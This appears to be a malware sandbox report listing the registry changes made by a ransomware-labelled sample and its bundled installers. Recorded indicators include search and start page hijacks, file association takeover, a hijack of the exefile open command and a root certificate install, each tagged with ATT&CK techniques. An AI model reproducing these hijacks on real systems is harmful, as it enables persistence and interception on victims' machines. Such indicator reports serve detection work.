Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "https://www.ya.ru/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\FaviconURL = "http://www.bing.com/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURLFallback = "http://www.bing.com/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURL = "http://www.bing.com/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\YaCreationDate = "2024-11-05"	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\MINIE	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR"	seederexe.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer	seederexe.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "https://www.ya.ru/?win=671&clid=2278731-666"	seederexe.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex	service_update.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	service_update.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\AppDataLow	service_update.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex\UICreated_SYSTEM = "1"	service_update.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJPEG.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJPEG.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationIcon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexSVG.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open\command	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexCSS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexFB2.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexINFE.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц."	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTIFF.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.swf\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.htm\OpenWithProgids\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexPDF.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open\command	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.infected\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.xhtml\OpenWithProgids\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexBrowser.crx\Application\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJPEG.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBP.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.htm	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.xml\OpenWithProgids	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\yabrowser\shell\open\command	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft	seederexe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTXT.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-120"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexXML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBM.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationIcon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBP.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexXML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexFB2.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexFB2.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexFB2.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц."	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTXT.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTXT.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.epub\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.infected\OpenWithProgids\YandexINFE.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.webp	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexEPUB.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц."	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexJS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBM.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBP.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationCompany = "Yandex"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.tiff\OpenWithProgids\YandexTIFF.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open\command	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexCSS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell\open\command	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexCSS.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationIcon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexBrowser.crx	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBP.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-123"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.swf	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.html\OpenWithProgids\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexCRX.Z7U7QVUCLRRNYFIB2IBUGKKOQQ	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTXT.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц."	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexTXT.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationCompany = "Yandex"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexWEBP.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\ = "Yandex Browser WEBP Document"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexPNG.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\AppUserModelId = "Yandex.Z7U7QVUCLRRNYFIB2IBUGKKOQQ"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexPDF.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationCompany = "Yandex"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.tif\OpenWithProgids	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.crx	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexBrowser.crx\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexHTML.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\Application\ApplicationCompany = "Yandex"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\YandexINFE.Z7U7QVUCLRRNYFIB2IBUGKKOQQ\shell	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.webm	setup.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	y_installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	y_installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	y_installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5